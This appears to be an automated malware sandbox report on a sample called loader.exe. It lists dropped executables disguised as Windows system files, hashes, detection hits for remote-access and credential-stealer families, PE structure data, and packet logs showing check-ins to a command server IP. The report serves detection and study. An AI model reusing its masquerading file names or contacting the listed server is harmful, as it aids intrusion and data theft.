                                                                                  SHA-512:8109F7ABA4B8A7C58BF8BF955BF092FC7F7F724BA6834F99AE29F2AAA489720911C9C33F30D1A190CAF9CBF1DC893B1F005924F21FDC80F93BFE42CD05EB5156
                                                                                  Malicious:false
                                                                                  Preview:Q9EuOG98NOlDKjI5X4uh8mhXEiMtYpRMzsHusd6w5mopTzZQB1hWov3ocrpp4Qjh6YObbXM488mV71EOJ5rhI5hDydSBxQ1oDGt4k7ynomXpJiqkmag8jBZA0Ln8FLHsH7S1IKoLGE3gi14QwrYWt3FBrsDZU0hcfoiMPzccwV1fI2c8QWLYwu9N1RJZGO0QgbB3SsA7P6jXCk2yPEI8pJpupVU8pCVifl8r1jpiVNJ0KmLQYUJBF1kWvQO7XBRMlB1amL6qYkmbAzjCKDkV3TdnAl5kVsLU66PJuuoMYdnePIW6rLxUb6TRiNaAPVVqZSfDkaRZYY7Zq8Y2P93J512An7lhUo6CI6F7nSWQ3X5D93kjzhvQcLuiZfamzuFub4Rt2bP6nnQi5zAuXBrw3qk7MhhH2ubIRKlEm0rYSyny5MmkepOyDT1vUUhV3HE2LHQuN6IgUTdECvB947nMfnF8T0tRTVeLuunx51WhhseuzwsjSha6d1XiBSbXN0N8ySURIOEDlGpxJVIgHJ9v5ir3XEvma8Trff5hcabEcXVXMkZqK4QE1bDQkb4Dcbnmw7SnZlEqr5SiNUqxoFcfsP0Dcp6BgYlAtslORvQizjW5IfCQuHYX9H3gHOLupDKTTRyescf2y3pI3457mpQY9OBmyEGDkf3wZCm0qihRmfiFbumNTOI9wvUEQLpnVcSSA3t0REQEI9wdp5KDc3tWX4Anshke236KNPFiBw5P7D1x90YVBlLcs55F3FHuevMOCmQazmCp7eZTDMo2IPdQsdbSU9p6oLvM1muWk8fZjgfOglCqaPlPR5gjK8Fz6GAwsMcacSSJtEqL8Nvt68fZjg45GLLl3pcdftfTImO

                                                                                  C:\Windows\LiveKernelReports\RuntimeBroker.exe

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1960448
                                                                                  Entropy (8bit):7.549634788914284
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:rmEq5m1AfIGxLnCllU3WU8zMYCNCsr+QKujfx:rmEq5GGxLnIlP2NgQKGfx
                                                                                  MD5:CF5B49706562BA2047CDA4A451DD573A
                                                                                  SHA1:D7D66016B5EA4215581F208C7972B2FF49CBEED1
                                                                                  SHA-256:74547E5B862BD3691947B78EABBDAB88C468E26144BD03911BE68941376DC89B
                                                                                  SHA-512:0DC54FC8AFE4A1B8CE0D72E215CF617DBC657F4E02CABE7BE694B0D20BE385F63848E49717BD4856547DBB52F8A762E54C63323B53188CC1D8127C54B6A10F1E
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....LTg............................N.... ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B................0.......H...........................h...}........................................0..........(.... ........8........E........<.......`...8....(.... ........8....(.... ....~{...{|...9....& ....8....(.... ....~{...{....9....& ....8....*....0.......... ........8........E....;...............G...86...~....(W... .... .... ....s....~....([....... ....8....r...ps....z*....~....(_...~....(c... ....?.... ....~{...{....9j...& ....8_......... ....8O...~....:.... ....~{...{l...91...& ....8&.....(.

                                                                                  C:\Windows\Performance\WinSAT\DataStore\b8bba6a6aa94c9

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with very long lines (649), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):649
                                                                                  Entropy (8bit):5.885071594411007
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:ZuNp8fdRh4vQxzpVL4jQ31+1JlccwS4VMoNYJq5/3i+IIASw:gNpAR+IxVJuQ3M13ZIbNYoZ3i+IIAD
                                                                                  MD5:3511A44FB064121721D60BE01E1AAA17
                                                                                  SHA1:906564440FF602995ADAA88DDF64E0B261A1155B
                                                                                  SHA-256:0703EAEB2EE1B3BBA50E21683E2297F81BD32ED620F02D6A25A9F8ED5AB74E88
                                                                                  SHA-512:CD676413997A634EB8789DFB8B1050D39135330B2939D0ADD43BA9986401F54487224BF91304D0007F122E2344A29BC0260E4D67838AD9CB3D1FB79A202FBED5
                                                                                  Malicious:false
                                                                                  Preview:Lsid28q3Z8U0w1BWt4ARxrg0Ly5wZUjODOCHsSxzkNIf91XY1gw4E30eMsRDD4eFZGxiy4obHLqjjA0Ubg52hpJJXi4AAuvqtDG3Ezk62Vx2MR5M17mh8lht6nKQ9naWZ9zf47Ql68AM2R7GnsJDHOsIfW6boT7O5adNbZR3rAkAlV1ppDnQeXOKRr9hBz6mAvQcxupNaPVHnrhKeQvlqruiLS5tZu22D8AzEZ25YZzPBHhkKzDuEV5TBsQey5xqWdDorrFFYzMR2ehEvUjkrIysDqxWJXHdlI2hD23ct7VOJobgKMtdVN9OpVlA3t5Bstptm9A2bH1twjjYPRL6nnHYJn1sQ2jACUgZ8r4KM0COWQcGwMumh9YFmRk9IRmih1rcDJaiXAuwk2C2Lv6DI6cC5bxrH4C4OdqfiADmwMOhOletOrxWUialYogmWsac7ziHMhTKsTR5r4yU6EcZGpjpCFG4daQEvwjYDWgrXnoBRe3dzMpRPAVSP2EGaZrRDMJ5VZRjhvCdBiYhMmERv8yvbRIKRaQ85W8EU8Ia5Fue81Qreg4yUZfEYYeDQGRHeDiokTNNeoWqOTwjAbqvfcng03p6dEKzxnA4TlGKTqUqCzzFm4DyZglBaBxqnQuZeh2lS2PZU

                                                                                  C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1960448
                                                                                  Entropy (8bit):7.549634788914284
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:rmEq5m1AfIGxLnCllU3WU8zMYCNCsr+QKujfx:rmEq5GGxLnIlP2NgQKGfx
                                                                                  MD5:CF5B49706562BA2047CDA4A451DD573A
                                                                                  SHA1:D7D66016B5EA4215581F208C7972B2FF49CBEED1
                                                                                  SHA-256:74547E5B862BD3691947B78EABBDAB88C468E26144BD03911BE68941376DC89B
                                                                                  SHA-512:0DC54FC8AFE4A1B8CE0D72E215CF617DBC657F4E02CABE7BE694B0D20BE385F63848E49717BD4856547DBB52F8A762E54C63323B53188CC1D8127C54B6A10F1E
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....LTg............................N.... ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B................0.......H...........................h...}........................................0..........(.... ........8........E........<.......`...8....(.... ........8....(.... ....~{...{|...9....& ....8....(.... ....~{...{....9....& ....8....*....0.......... ........8........E....;...............G...86...~....(W... .... .... ....s....~....([....... ....8....r...ps....z*....~....(_...~....(c... ....?.... ....~{...{....9j...& ....8_......... ....8O...~....:.... ....~{...{l...91...& ....8&.....(.

                                                                                  C:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):1224
                                                                                  Entropy (8bit):4.435108676655666
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                  C:\Windows\System32\SecurityHealthSystray.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4608
                                                                                  Entropy (8bit):3.9486045583653926
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:6VJzPt5M7Jt8Bs3FJsdcV4MKe27qd4iE76xvqBHWOulajfqXSfbNtm:APYPc+Vx9MqJE76xvkwcjRzNt
                                                                                  MD5:FF4FED55573F11D253BEB119AF2C3564
                                                                                  SHA1:BF959EF84A8F86AF3E60084769A38CBB9CF2DBCA
                                                                                  SHA-256:35020EB13BA8ADB2D91438101826E9BE2126C71A3C8DEC3404E8AC772A17B36D
                                                                                  SHA-512:D98C602628EA002CA471047DB5277CF48982D3B0FD771B22419EE71F35C0BB5B522B017BAD97533C8A5C9343E5C467CA0971CDB5892DA0ECC3B7BB64943A609C
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................T'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..,.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                  \Device\Null

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\w32tm.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):151
                                                                                  Entropy (8bit):4.786697028237252
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:VLV993J+miJWEoJ8FXaTX9QvPEr0fbAXXKvpMP0qvj:Vx993DEURRysXj
                                                                                  MD5:7F230AC816B49FC9D0A7233F6805145D
                                                                                  SHA1:1F0100ABA2A45D7CF8BD1BA052D33EFA4C53F9DE
                                                                                  SHA-256:47635E19C36142437C2A224E100CD96D5378895DCF0A8EBF9D6C1C0EEBB53078
                                                                                  SHA-512:1FAE8688EE2B61365D30664E932291906F3BCC77B1AB9B3A3187613E71E912D9577F02654BC5BF9D17EE4B4F12A8DF62D5BE08848FCF453EBCE69E2A09D9BA30
                                                                                  Malicious:false
                                                                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 11/01/2025 02:16:08..02:16:08, error: 0x80072746.02:16:13, error: 0x80072746.

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.785550696535967
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:loader.exe
                                                                                  File size:3'314'471 bytes
                                                                                  MD5:2307ca04c2633d28345fb0580c77c2ec
                                                                                  SHA1:edbd1f092ed03cb2674877aba6e874722ee07814
                                                                                  SHA256:168637ea64d64afefd1f88b91ffecb74715ccb6a98acf73d4a16175511628276
                                                                                  SHA512:c2646c5bf3dcd6ef4679af80ae6424c1f88e3f29a40beff729b59bebd8fd3d9b0d45392d2e11f4e1b69ada0f4ec20cfc45430d184cdf0238f2845b7deaff7e9b
                                                                                  SSDEEP:98304:ups+iZyomWShz+6WumEq5GGxLnIlP2NgQKGfxx:ndZOhNWumEqxLIB21K6H
                                                                                  TLSH:24E5E0195AD24E37C27467324597103D43A0D7767D72EB1A360F20E2A903BB6CBB62B7
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                  File Icon

                                                                                  Icon Hash:1767d1b1b1d46917

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x403e50
                                                                                  Entrypoint Section:
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:d89f3dcdac0c8dba11dc1162435bedbb

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  call 00007F7D4C7C4D76h
                                                                                  jmp 00007F7D4C7C4B8Eh
                                                                                  push 0044BB60h
                                                                                  push dword ptr fs:[00000000h]
                                                                                  mov eax, dword ptr [esp+10h]
                                                                                  mov dword ptr [esp+10h], ebp
                                                                                  lea ebp, dword ptr [esp+10h]
                                                                                  sub esp, eax
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  mov eax, dword ptr [00466ECCh]
                                                                                  xor dword ptr [ebp-04h], eax
                                                                                  xor eax, ebp
                                                                                  push eax
                                                                                  mov dword ptr [ebp-18h], esp
                                                                                  push dword ptr [ebp-08h]
                                                                                  mov eax, dword ptr [ebp-04h]
                                                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                  mov dword ptr [ebp-08h], eax
                                                                                  lea eax, dword ptr [ebp-10h]
                                                                                  mov dword ptr fs:[00000000h], eax
                                                                                  ret
                                                                                  mov ecx, dword ptr [ebp-10h]
                                                                                  mov dword ptr fs:[00000000h], ecx
                                                                                  pop ecx
                                                                                  pop edi
                                                                                  pop edi
                                                                                  pop esi
                                                                                  pop ebx
                                                                                  mov esp, ebp
                                                                                  pop ebp
                                                                                  push ecx
                                                                                  ret
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  add esp, 04h
                                                                                  jmp 00007F7D4CBB292Fh
                                                                                  out dx, al
                                                                                  add byte ptr [edi], cl
                                                                                  mov bh, bh
                                                                                  push ebp
                                                                                  cmp byte ptr [ebx], ah
                                                                                  pop eax
                                                                                  call far 7520h : BE5F4EFAh
                                                                                  inc ecx
                                                                                  ret
                                                                                  pop ebp
                                                                                  xchg byte ptr [B763C74Bh], dh
                                                                                  inc esi
                                                                                  stosb
                                                                                  mov al, byte ptr [8DF537CAh]
                                                                                  mov word ptr [eax], fs
                                                                                  push ebx
                                                                                  lahf
                                                                                  push ecx
                                                                                  pop ecx
                                                                                  rcl dword ptr [ecx+7Bh], FFFFFFCCh
                                                                                  jc 00007F7D4C7C4D7Ah
                                                                                  mov byte ptr [ecx+2B28726Dh], dl
                                                                                  dec edi
                                                                                  dec esp
                                                                                  sar byte ptr [edx], 1
                                                                                  cmp ecx, dword ptr [ecx+esi*2+61h]
                                                                                  cdq
                                                                                  jnl 00007F7D4C7C4CC0h
                                                                                  pop ebp
                                                                                  std
                                                                                  movsb
                                                                                  push ebp
                                                                                  in al, 24h
                                                                                  adc ah, byte ptr [edx]
                                                                                  cmp al, F9h
                                                                                  pop esi
                                                                                  outsd
                                                                                  lodsb
                                                                                  imul ecx, dword ptr [edx+eax*2], 63A9D3FCh
                                                                                  inc ebx
                                                                                  mov bh, 62h
                                                                                  jo 00007F7D4C7C4D04h

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x30e0200x34cheat
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x30e0540x210cheat
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x7d0000x12aec.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x30e0000xccheat
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  0x10000x320000x1be008fe0979436817318cbc0e9cefcfd6da8False0.997276135089686data7.9966173970846315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  0x330000xb0000x48001f89350db9659affeed8b007e363a875False0.9948459201388888data7.980672042041817IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  0x3e0000x250000x800ef9ca6049a80a49fd3f9d2ad4b52d97dFalse0.91162109375data7.4680767408434345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  0x630000x10000x2008a6f114c8b2a3ee64ca1d82d6be339e8False0.4453125data3.7813580233499082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  0x640000x160000x2600e0a332328574052591e79b2a921f110bFalse0.9833470394736842data7.940310001309214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  0x7a0000x30000x2000e39ec2ca62447a50635a635042b41792False0.9580078125data7.847280090655699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x7d0000x130000x12c0028cfe84555d1d637f43a1088bab53028False0.9374609375data7.86163703105012IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  0x900000x27e0000x2ba0003227782dc57116467257c779fd82c72unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  cheat0x30e0000xe70000xe66000e69e40f60ca9471cb4b6a5a0a0ba889False0.9968048443434617data7.983850693923614IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  PNG0x645240xb45dataEnglishUnited States1.0038128249566725
                                                                                  PNG0x6506c0x15a9dataEnglishUnited States0.9710354815351194
                                                                                  RT_ICON0x7d5240x10de5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0004486706323361
                                                                                  RT_DIALOG0x774000x286emptyEnglishUnited States0
                                                                                  RT_DIALOG0x776880x13aemptyEnglishUnited States0
                                                                                  RT_DIALOG0x777c40xecemptyEnglishUnited States0
                                                                                  RT_DIALOG0x778b00x12eemptyEnglishUnited States0
                                                                                  RT_DIALOG0x779e00x338emptyEnglishUnited States0
                                                                                  RT_DIALOG0x77d180x252emptyEnglishUnited States0
                                                                                  RT_STRING0x8e30c0x1e2dataEnglishUnited States0.3900414937759336
                                                                                  RT_STRING0x8e4f00x1ccdataEnglishUnited States0.4282608695652174
                                                                                  RT_STRING0x8e6bc0x1b8dataEnglishUnited States0.45681818181818185
                                                                                  RT_STRING0x8e8740x146dataEnglishUnited States0.5153374233128835
                                                                                  RT_STRING0x8e9bc0x46cdataEnglishUnited States0.3454063604240283
                                                                                  RT_STRING0x8ee280x166dataEnglishUnited States0.49162011173184356
                                                                                  RT_STRING0x8ef900x152dataEnglishUnited States0.5059171597633136
                                                                                  RT_STRING0x8f0e40x10adataEnglishUnited States0.49624060150375937
                                                                                  RT_STRING0x8f1f00xbcdataEnglishUnited States0.6329787234042553
                                                                                  RT_STRING0x8f2ac0xd6dataEnglishUnited States0.5747663551401869
                                                                                  RT_GROUP_ICON0x8f3840x14Targa image data - Map 32 x 3557 x 1 +11.1
                                                                                  RT_MANIFEST0x8f3980x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                  Imports

                                                                                  DLLImport
                                                                                  kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                                                                  user32.dllMessageBoxA
                                                                                  advapi32.dllRegCloseKey
                                                                                  oleaut32.dllSysFreeString
                                                                                  gdi32.dllCreateFontA
                                                                                  shell32.dllShellExecuteA
                                                                                  version.dllGetFileVersionInfoA
                                                                                  gdiplus.dllGdipAlloc

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2025-01-11T06:43:15.910693+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.65690537.44.238.25080TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 11, 2025 06:43:06.121644020 CET5554953192.168.2.61.1.1.1
                                                                                  Jan 11, 2025 06:43:06.126566887 CET53555491.1.1.1192.168.2.6
                                                                                  Jan 11, 2025 06:43:06.126667023 CET5554953192.168.2.61.1.1.1
                                                                                  Jan 11, 2025 06:43:06.131515980 CET53555491.1.1.1192.168.2.6
                                                                                  Jan 11, 2025 06:43:06.601691961 CET5554953192.168.2.61.1.1.1
                                                                                  Jan 11, 2025 06:43:06.606973886 CET53555491.1.1.1192.168.2.6
                                                                                  Jan 11, 2025 06:43:06.607115984 CET5554953192.168.2.61.1.1.1
                                                                                  Jan 11, 2025 06:43:14.671838045 CET5690453192.168.2.61.1.1.1
                                                                                  Jan 11, 2025 06:43:14.676744938 CET53569041.1.1.1192.168.2.6
                                                                                  Jan 11, 2025 06:43:14.676846027 CET5690453192.168.2.61.1.1.1
                                                                                  Jan 11, 2025 06:43:14.676865101 CET5690453192.168.2.61.1.1.1
                                                                                  Jan 11, 2025 06:43:14.681694984 CET53569041.1.1.1192.168.2.6
                                                                                  Jan 11, 2025 06:43:15.187534094 CET53569041.1.1.1192.168.2.6
                                                                                  Jan 11, 2025 06:43:15.198729038 CET5690453192.168.2.61.1.1.1
                                                                                  Jan 11, 2025 06:43:15.203850031 CET53569041.1.1.1192.168.2.6
                                                                                  Jan 11, 2025 06:43:15.203938961 CET5690453192.168.2.61.1.1.1
                                                                                  Jan 11, 2025 06:43:15.210632086 CET5690580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:15.215467930 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:15.215596914 CET5690580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:15.226346016 CET5690580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:15.231122017 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:15.583816051 CET5690580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:15.588722944 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:15.863224983 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:15.910692930 CET5690580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:15.942276001 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:15.942298889 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:15.942451000 CET5690580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:15.979217052 CET5690580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:15.994406939 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:16.179730892 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:16.180250883 CET5690580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:16.185133934 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:16.186331034 CET5691580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:16.191236973 CET805691537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:16.191371918 CET5691580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:16.191663027 CET5691580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:16.196482897 CET805691537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:16.440637112 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:16.488873959 CET5690580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:16.524147034 CET5690580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:16.529062986 CET805690537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:16.537700891 CET5691580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:16.542650938 CET805691537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:16.542666912 CET805691537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:16.542678118 CET805691537.44.238.250192.168.2.6
